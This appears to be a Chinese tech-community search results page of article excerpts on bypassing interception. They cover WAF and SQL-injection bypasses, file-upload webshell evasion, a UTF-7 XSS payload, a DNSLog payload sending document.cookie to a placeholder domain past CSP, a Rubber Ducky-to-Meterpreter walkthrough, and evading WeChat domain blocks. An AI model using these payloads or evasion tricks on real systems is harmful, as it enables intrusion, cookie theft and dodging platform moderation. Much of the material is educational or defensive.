- 综合排序
- 最热优先
- 最新优先
- 来自专栏白安全组
burpsuite绕过网站拦截小技巧
有些网站为了安全性,会禁止用户使用burp并进行拦截。 大家都知道我们的burp开启后可以访问http://burp/来下载证书。 拦截burp的原理会根据网站会利用代码通过用户本地能加载burp的图标http://burp/favicon.ico,或者可以访问http://burp/ 我们解决这个只需要关闭这个功能即可 (勾上是关闭
3.5K20编辑于 2022-12-01 - 来自专栏全栈工程师修炼之路
WAF安全拦截绕过思路和手法
0x00 介绍前言 收集之中 WAF绕过方法: HPP(参数污染)方式 判断注入: xor 可直接过大部分的防护(包括安全狗) order by 大部分WAF默认拦截(包括安全狗) union 不拦截 select 不拦截 union selec 不拦截 union select 拦截 注:以上是在GET方式下的结果 POST下: and 不拦截 union select 不拦截 底线为↓ union select 1,2 from 这里开始被拦截 实际上真正要绕过的是from是否被匹配 安全狗WAF ByPass之HPP应用 描述: 一个有趣的注入点(可以使用其绕过SafeDog) #正常访问 id=1137 #HPP参数污染#且参数一为113 参数二为7 http://192.168.1.170/Production/PRODUCT_DETAIL.asp? id=113&id=7 #回显的结果为id=113, 7 ? WeiyiGeek.
1.4K20发布于 2020-10-23 - 来自专栏全栈工程师修炼之路
WAF安全拦截绕过思路和手法
0x00 介绍前言 收集之中 WAF绕过方法: HPP(参数污染)方式 判断注入: xor 可直接过大部分的防护(包括安全狗) order by 大部分WAF默认拦截(包括安全狗) union 不拦截 select 不拦截 union selec 不拦截 union select 拦截 注:以上是在GET方式下的结果 POST下: and 不拦截 union select 不拦截 底线为↓ union select 1,2 from 这里开始被拦截 实际上真正要绕过的是from是否被匹配 安全狗WAF ByPass之HPP应用 描述: 一个有趣的注入点(可以使用其绕过SafeDog) #正常访问 id=1137 #HPP参数污染#且参数一为113 参数二为7 http://192.168.1.170/Production/PRODUCT_DETAIL.asp? id=113&id=7 #回显的结果为id=113, 7 WeiyiGeek.
71530编辑于 2022-09-29 微信域名拦截原理拆解+二级域名绕过技巧(2026实操版)| 私域引流防封指南
私域推广、引流从业者常遇微信域名拦截问题,轻则错失流量,重则损失营收。微信拦截并非随机,而是三重风控逻辑,二级域名能绕开拦截,核心是利用其“单域名拦截”特性。 关键细节:微信黑名单以“单域名”为单位,主域与二级域互不连带,这是二级域名绕拦的核心前提。 二、二级域名绕过微信拦截的5个实操技巧二级域名绕拦核心:单域名拦截特性+无需单独备案、可快速切换。以下技巧从基础到进阶。 技巧2:核心款——二级域名+跳板页(防封率90%+)结构:微信→合规二级域(跳板)→真实落地页。 五、总结微信域名拦截核心是“风控分层、单域拦截”,二级域名绕拦本质是合规前提下的风险分散。短期可通过“二级域名+跳板页+轮询”保障业务,长期需做好合规运营、优化配置,才能实现域名稳定,避免得不偿失。
63910编辑于 2026-04-10- 来自专栏洛米唯熊
扫目录+N多代理IP绕过拦截
在渗透测试的时候,很担心平时在扫WEB目录的时候,频繁的请求会容易被封IP.被封IP以后.要么等上一段时间,要么更换自己的IP.重新启动扫描器.这样的效率很低下,也很浪费自己的工作时间.
2.3K10发布于 2020-04-08 - 来自专栏洛米唯熊
sqlmap+外部代理池绕过IP拦截
3.sqlmap加上代理"--proxy=http://127.0.0.1:5320"
1.9K30发布于 2020-04-12 XSS检测绕过(UTF-7编码绕过)
叮咚,现场运维来消息了,说项目被检测到有高危漏洞,要求修复,以为就是jar安全漏洞,升级就完事了,就让发过来看看,亚麻袋住了,“XSS检测绕过(UTF-7编码绕过)”,从没见过啊,还是UTF-7。 我电脑上的编辑器都没找到有支持UTF-7编码的,首先想到的,把这些信息丢给DeepSeek帮我分析看看,问Ai怎么防御?结果没有我想要的方案。 然后去网络搜索下吧,看看大家前辈们有没解决过,果然有相关文件,但是都没给出具体解决方案,不过也有所收获,得到了一段UTF-7编码的XSS注入参数(如果Get参数请求,记得对参数URL编码)+ADw-script +AD4-alert('UTF-7 XSS')+ADw-/script+AD4-进入正题,结合项目代码,想到可以用Filter过滤器对参数拦截,那就动手来吧,以项目SpringCloud Zuul为例# xss regexxss: enable: true regexes: # UTF-7编码绕过 - "(?
34010编辑于 2025-10-18- 来自专栏HACK学习
干货 | 最全的文件上传漏洞之WAF拦截绕过总结
大致步骤如下: 1.获取Request Header里的Content-Type值中获取boundary值2.根据第一步的boundary值,解析POST数据,获取文件名3.判断文件名是否在拦截黑名单内 /白名单外 了解了WAF如何对恶意文件进行拦截之后,我将常见的绕过方法分为如下几类,最后再使用目前最新版的安全狗进行绕过演示。 若WAF匹配文件名到换行截止,则可以绕过。 最后测出的结果如下,长度为3710个字符: image-20220122154848589 虽然并没有帮我们上传上去,但是可以成功绕过安全狗拦截。 image-20220122161340032 成功绕过。
16K67编辑于 2022-02-17 - 来自专栏FreeBuf
如何用橡皮鸭绕过杀软、渗透Win 7?
准备 进行实验所要做的准备: Windows 7 (受害者主机) Kali Linux 2.0 (攻击者主机) USB Rubber Ducky 硬件 注意:Windows 7 和 Kali系统可以是虚拟运行的也可以是实体运行的 这个项目给予MatthewGraeber的Powershell攻击和DavidKennedy (TrustedSec) 和Josh Kelly在Defcon 18上展示的powershell绕过技巧。 打上全部补丁的Windows 7 + AVG 2015 Windows 7 网络信息 插入橡皮鸭 17. sessions -i 1 UAC绕过 20.由于UAC的关系,目前为止,我们还没有系统权限 21. 我们看看能不能用别的模块绕过UAC,经过几番实验后,我们发现bypassuac_vbs可以用来绕过。 22. 设置exploit,然后设置其他payload返回你一个有权限的shell。
1.9K70发布于 2018-02-08 - 来自专栏字节脉搏实验室
WAF的那点事
硬件型WAF 以硬件形式部署在链路中,支持多种部署方式,当串联到链路中时可以拦截恶意流量,在旁路监听模式时只记录攻击不进行拦截。 WAF方法 例如SQL注入漏洞绕过 1.大小写混合 在规则匹配时只针对特定大写或小写的情况,遇到时可以使用大小写混合绕过。 3.替换关键字 WAF采用替换或者删除select等敏感关键字的时候,如果只匹配一次则很容易进行绕过。 select polygon((select*from(select*from()a)b)); 7.寻找网站源站IP 对于有些waf防护的网站而言,可以找到真实ip地址,然后通过ip访问就可以进行绕过 ③找网站的二级域名、NS、MX记录等对应的IP。 ④使网站发送邮件给你,查看发送方的IP。
1.1K10发布于 2020-04-14 - 来自专栏Khan安全团队
CVE-2025-0411 7-Zip Mark-of-the-Web 绕过
CVE-2025-0411 正在被野外利用,该漏洞是在 7-Zip 归档器中发现的,并被用于针对乌克兰组织的 SmokeLoader 恶意软件活动。 根本原因 CVE-2025-0411 漏洞允许攻击者通过使用 7-Zip 对文件进行双重压缩来绕过此 MotW 保护。 通过利用这一点,攻击者可以通过将恶意可执行文件隐藏在内部压缩文件中并通过外部压缩文件进行分发来绕过 Windows 的 MotW 保护。 如果用户使用 7-Zip 打开这个双压缩文件并运行其中的文件,则恶意软件可能会在没有任何 MotW 警告或 Windows Defender SmartScreen 扫描的情况下执行。 缓解建议 更新 7-Zip:从 7-Zip 官方网站下载并安装 24.09 或更高版本。 谨慎对待不受信任的文件:避免打开来自未知或可疑来源的文件,尤其是压缩档案。
75810编辑于 2025-04-30 - 来自专栏FreeBuf
小米范系列渗透测试工具介绍
3、通过搜索引擎、获取其他接口查询二级域名(百度、必应、netcraft,可设置爬取线程也爬取条数) 4、通过字典爆破二级域名(可自定义线程数即字典)。 7、对获取到第五步ip列表对应的ip c段。 3、请求拦截、修改(此拦截并非使用代理的方式,不存在https安装证书的问题,但是有些地方也没有代理拦截那么方便)。 4、多个代理快速切换。 5、网页URL提取。 可绕过前端js加密、但速度慢、用于少量口令破解),可自行替换字典,路径dict/form-username.txt、dict/form-password.txt。 10、域名反查(调用爱站)。 11、二级域名查询(调用netcraft)。
5.6K50发布于 2018-02-08 - 来自专栏网站漏洞修补
渗透测试服务 针对CSRF漏洞检测与代码防御办法
通常我们SINE安全在渗透测试客户网站是否存在csrf漏洞,首先采用点击的形式去测试漏洞,在一个网站功能上利用点击的方式绕过安全效验与拦截,从技术层面上来讲,点击的请求操作来自于信任的网站,是不会对csrf 再一个检测漏洞的方式更改请求方式,比如之前网站使用的都是get提交方式去请求网站的后端,我们可以伪造参数,抓包修改post提交方式发送过去,就可以绕过网站之前的安全防护,直接执行CSRF恶意代码,漏洞产生的原因就是 ,网站开发者只针对了GET请求方式进行安全拦截,并没有对post的方式进行拦截,导致漏洞的发生。 有些客户网站使用了token来防止XSS跨站的攻击,在设计token的时候没有考虑到空值是否可以绕过的问题,导致可以token为空,就可以直接将恶意代码传入到后端中去。 对referer字段进行安全效验,检查URL是否是白名单里的,对于referer为空直接拦截掉该请求,URL的白名单要含有WWW,拒绝二级域名的请求。
76840发布于 2019-09-06 - 来自专栏网站漏洞修复
渗透测试公司 该如何检测CSRF漏洞 原
通常我们SINE安全在渗透测试客户网站是否存在csrf漏洞,首先采用点击的形式去测试漏洞,在一个网站功能上利用点击的方式绕过安全效验与拦截,从技术层面上来讲,点击的请求操作来自于信任的网站,是不会对csrf 再一个检测漏洞的方式更改请求方式,比如之前网站使用的都是get提交方式去请求网站的后端,我们可以伪造参数,抓包修改post提交方式发送过去,就可以绕过网站之前的安全防护,直接执行CSRF恶意代码,漏洞产生的原因就是 ,网站开发者只针对了GET请求方式进行安全拦截,并没有对post的方式进行拦截,导致漏洞的发生。 有些客户网站使用了token来防止XSS跨站的攻击,在设计token的时候没有考虑到空值是否可以绕过的问题,导致可以token为空,就可以直接将恶意代码传入到后端中去。 对referer字段进行安全效验,检查URL是否是白名单里的,对于referer为空直接拦截掉该请求,URL的白名单要含有WWW,拒绝二级域名的请求。
1.2K10发布于 2019-09-08 - 来自专栏世荣的博客
DNSLog的使用方法
我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级域名甚至三级域名上去请求,就可以通过DNS解析日志来获取它们。 场景三:XSS绕过CSP CSP(内容安全策略)是防御XSS最有效的手段之一。 当我们发现一个网站有XSS漏洞,想利用XSS平台来打Cookie时,CSP会通过白名单的方式禁止跨域加载脚本,恶意代码会被拦截,导致XSS无法利用。 这里,我们通过DNS解析突破CSP的拦截。 由于DNS预解析可以绕过CSP进行解析,结合DNSLOG,我们即可窃取在CSP保护下的Cookie。 document.cookie.split(/;|=/)[1]) + ".your-dnslog.com'>" 上面的Payload将Cookie中截取的重要字段进行简单的base64编码后,作为我们DNSLOG平台的二级域名
4.6K20编辑于 2022-03-21 - 来自专栏FreeBuf
绕过网站安全狗拦截,上传Webshell技巧总结 | 附免杀PHP一句话
*本文原创作者:1_2,本文属FreeBuf原创奖励计划,未经许可禁止转载 这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法。 思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。 废话不多说,切入正题。。。。 很明显,文件名为”yijuhua.php”被拦截。。。。 4、尝试%00截断: ? 很明显,失败了。。。 绕过网站安全狗的拦截,成功上传WebShell。。。 (2)删除Content-Disposition字段里的空格: ? ? ? (3)修改Content-Disposition字段值的大小写: ? 7、免杀PHP一句话: <?
2.3K90发布于 2018-02-09 - 来自专栏信安之路
Clickjacking简单介绍
=location) top.location=self.location; 事实上,这种代码很容易被绕过,在后文中讨论。 对于使用parent.location来防御的可以使用多层嵌套的方式绕过。 IE的xss筛选器自动拦截了跳转。 斯坦福的文章里写了Chrome也会出现这种情况,并给出了攻击代码: <iframe src=http://www.victim.com/?v=if(top+! %3D+self)+%7B+top.location%3Dself.location%3B+%7D"> 但是测试发现,新版的Chrome并不会拦截了,会直接跳转过去。 aaa.com")==1) { top.location.replace(document.location.href); } } 判断字符串中是否含有本域名是常见的错误用法,利用二级域名的方式便可绕过
1.4K00发布于 2018-08-08 - 来自专栏Mirror的技术成长
Web安全攻防(简)学习笔记
子域名收集 子域名是所谓的二级域名,通常一个主站的防护是严格的,但同时也会存在更多的二级子域名且可能防护简单。 ,(select user()),0x7e),3) 时间注入(盲注) 时间注入的逻辑是通过逻辑与非的方式设置一个时间函数(延迟函数)通过观察页面的响应来确定是否构成正确的语句. $row{'pass'}; echo "
"; ---- SQL注入绕过 大小写绕过 web应用对用户输入提交的内容进行敏感关键字扫描一旦符合则拦截当前的用户行为请求;往往在后台的黑名单中会忽视大小写问题 安全建议:将用户输入的内容统一大小写进行关键字比对(不改变原来的字符串内容) 双写绕过 当web应用对敏感关键字进行拦截删除,将敏感关键字从字符串中删除;攻击者构造类似“uniunionon”这样的字符串 安全建议:采用多重的敏感关键字拦截,或者说对发现存在敏感字的请求全部拦截取消当前的访问。1.6K31发布于 2020-11-13 - 来自专栏拭心的安卓进阶之路
全栈开发笔记1:首个项目的收获
7.跨域问题解决 2023.10.2 三种方式: 前端和后端用同一个域名 nginx 处理 后端处理 加个 A 记录,二级域名: 登录态不对的问题:cookie 不一样,导致 session id 捕获代码中的所有异常,让前端可以感知到更具体的信息 集中处理,可以看到错误日志 通过 Spring AOP 实现 RestControllerAdvice 全局请求日志和登录校验 axios 统一拦截处理响应 GenerateAllSetter 插件,一键生成对象的所有属性 setter 代码 选中新创建的对象,「option + . 」,在弹出的里面选择 generate all 两次密码的校验,后端也要有,因为前端的逻辑是可以绕过的
33820编辑于 2023-10-05 - 来自专栏SpringBoot图文教程
SpringBoot图文教程7—SpringBoot拦截器的使用姿势这都有
但是相对于过滤器而言,拦截器要的控制更加的细节,拦截器可以在三个地方进行执行。 可以在请求到达Controller控制器之前 通过拦截器执行一段代码 也可以在控制器执行之后,通过拦截器执行一段代码 【此时只是Controller执行完毕 视图还没有开始渲染】 最后在整个请求结束的时候还可以通过拦截器执行一段时间代码 拦截器使用的开发步骤 创建拦截器类 注册拦截器 配置拦截规则 创建拦截器类 /** * @Component 和 @Service 是一个作用 创建对象 */ @Component public 在注册拦截器的时候 配置拦截路径的addPathPatterns参数为可变长参数,就意味着可以接受String的数组,可以配置多个参数。 addPathPatterns方法的源码如下 排除拦截路径 注册多个拦截器 我们可以实现多个拦截器,并依次将他们注册进去 public void addInterceptors(InterceptorRegistry
6.6K40发布于 2020-03-28
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号